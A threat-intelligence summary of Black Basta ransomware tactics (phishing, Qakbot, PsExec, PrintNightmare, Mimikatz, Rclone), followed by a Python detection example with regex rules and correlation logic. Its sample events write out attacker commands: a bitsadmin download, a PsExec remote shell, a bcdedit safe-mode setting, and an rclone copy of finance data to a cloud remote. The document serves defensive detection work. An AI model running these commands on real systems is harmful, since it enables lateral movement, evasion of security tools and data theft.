Trend Micro Takes a Deep Dive into Black Basta Ransomware
Industries: Apparel & Fashion, Construction, Entertainment, Finance, Insurance, Manufacturing, Materials, Professional Services, Retail, Technology, Transportation and Utilities | Level: Tactical | Source: Trend Micro
Arriving as early as April 2022, Black Basta ransomware-as-a-service (RaaS) has already become a menace in the threat landscape. Based on the victims the group has attacked, Black Basta takes a targeted approach rather than spray-and-pray tactics. Trend Micro researchers have published an in-depth spotlight article detailing the group's known tactics, techniques, and procedures (TTPs). Geographically, the United States, Germany, Canada, France, and Austria have stood out as the most prominent attack targets. Victims span a variety of industries, including apparel & fashion, construction, entertainment, finance, insurance, manufacturing, materials, professional services, retail, technology, transportation, and utilities. Based on available attack telemetry, Black Basta was most active in June 2022, with 22 attacks. For initial access, the group has been known to use spear phishing, to deploy Qakbot/Qbot malware, or to obtain corporate access credentials from underground forums. Various PowerShell scripts are used in its attacks to carry out system reconnaissance, disable security products, and support lateral movement. BITSAdmin, PsExec, Windows Management Instrumentation (WMI), and RDP are also used for lateral movement. To escalate privileges, Black Basta operators have been observed exploiting PrintNightmare (CVE-2021-1675) to deliver Cobalt Strike beacons. Additional techniques include Mimikatz for credential access, rebooting the host into safe mode to circumvent security controls, and Rclone for data exfiltration.
- Black Basta: Discovery, Lateral Movement, Priv Esc and Rclone
Anvilogic Use Cases:
- Modify Group Policy
- Remote Admin Tools
- Rclone Execution
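As an added example (not code from Trend Micro's article or from Anvilogic), the following Python applies rule logic for three of the behaviours described above, remote admin tools (PsExec, BITSAdmin, WMI), the safe-mode reboot, and Rclone execution, to constructed process-creation events and then correlates hits per account, since one account triggering several use cases is a stronger signal than any single rule. The event fields, hostnames, users, paths, the "Safe Mode Reboot" rule name, and the regex patterns are all assumptions made for this example.

```python
import re

# Constructed sample process-creation events (not real telemetry); the
# fields mimic a normalised EDR / Sysmon Event ID 1 feed.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "jdoe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high http://example.invalid/a.dll C:\Users\Public\a.dll"},
    {"host": "srv02", "user": "svc_backup", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\fs01 -s cmd.exe"},
    {"host": "srv02", "user": "SYSTEM", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": r"bcdedit /set {default} safeboot network"},
    {"host": "fs01", "user": "svc_backup", "image": r"C:\ProgramData\rc.exe",
     "cmdline": r"rc.exe copy D:\Finance mega:exfil --transfers 20 --no-check-certificate"},
    {"host": "ws03", "user": "alice", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]

# Each rule: (use case name, regex evaluated against the lower-cased command line).
RULES = [
    ("Remote Admin Tools",
     re.compile(r"(?:^|\\|\s)psexec(?:64)?\.exe\b|bitsadmin(?:\.exe)?\s+/transfer|wmic(?:\.exe)?\s+.*process\s+call\s+create")),
    ("Safe Mode Reboot",
     re.compile(r"bcdedit(?:\.exe)?\s+/set\b.*\bsafeboot\b")),
    # Rclone is often renamed, so key on its sub-commands plus the "<remote>:<path>"
    # argument syntax rather than on the binary name alone (single-letter drive
    # specifiers such as D:\ are excluded by requiring two or more characters).
    ("Rclone Execution",
     re.compile(r"\b(?:rclone|rc)(?:\.exe)?\s+(?:copy|sync|move|lsd|config)\b.*\s[a-z]\w+:\S*")),
]


def evaluate(events, rules=RULES):
    """Return (use_case, host, user, cmdline) tuples, one per rule that fires."""
    hits = []
    for ev in events:
        cmd = ev["cmdline"].lower()
        for name, pattern in rules:
            if pattern.search(cmd):
                hits.append((name, ev["host"], ev["user"], ev["cmdline"]))
    return hits


def correlate(hits, min_use_cases=2):
    """Map each account to its distinct use cases, keeping only accounts that
    triggered at least min_use_cases (lateral movement plus exfiltration, say)."""
    per_user = {}
    for name, _host, user, _cmd in hits:
        per_user.setdefault(user, set()).add(name)
    return {u: sorted(c) for u, c in per_user.items() if len(c) >= min_use_cases}
```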